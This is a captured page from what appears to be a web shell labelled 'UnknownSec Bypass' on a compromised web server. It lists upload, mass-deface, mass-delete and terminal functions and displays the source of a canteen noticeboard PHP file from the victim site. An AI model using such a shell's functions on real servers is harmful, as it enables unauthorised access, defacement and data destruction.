UnknownSec Bypass
403
:
/
var
/
www
/
html
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
khatima_dashboard.php
<?php include "top_khatima.php"; //include "banner.php"; ?> <!-- /content-6-section --> <section class="w3l-wecome-content-6"> <!-- /content-6-section --> <div class="ab-content-6-mian py-5"> <div class="container py-lg-3"> <div class="title-head text-left mb-4"> <!-- <div align="center"> <h6 class="sub-title"><a href="khatima_downloads.php">CLICK HERE TO READ POLICY/INFORMATION</a></h6> </div> --> <!-- <div align="center"> <h2 class="sub-title"><i class="fa fa-download"></i> <a href="banbasa_downloads.php">??????/????? ????? ?? ??? ???? ????? ????</a></h2> </div> --> <h6 class="sub-title">Dashboard</h6> <h3 class="hny-title"> News & <span>Notice</span> </h3> </div> <div class="welcome-grids"> <div class="col-lg-12 mb-lg-0"> <?php include "config.php"; mysqli_set_charset($conn,"utf8"); $sql="select * from noticeboardtb where CanteenName='Khatima' "; $result=mysqli_query($conn,$sql) or die("Query Failed."); if(mysqli_num_rows($result)>0){ ?> <?php while ($row = mysqli_fetch_assoc($result)) { ?> <lable ><?php echo $row['Notice']; ?> </lable> <?php } } ?> </div> <!--<div class="col-lg-6 welcome-image"> <img src="assets/images/ab1.jpg" class="img-fluid" alt="" /> </div>--> <!-- //content-6-section --> <?php include "khatima_dashboard-buttons.php";?> <!-- /content-4-section --> </div> </div> </div> </section> <?php include "footer.php"; ?>
Copyright © 2025 - UnknownSec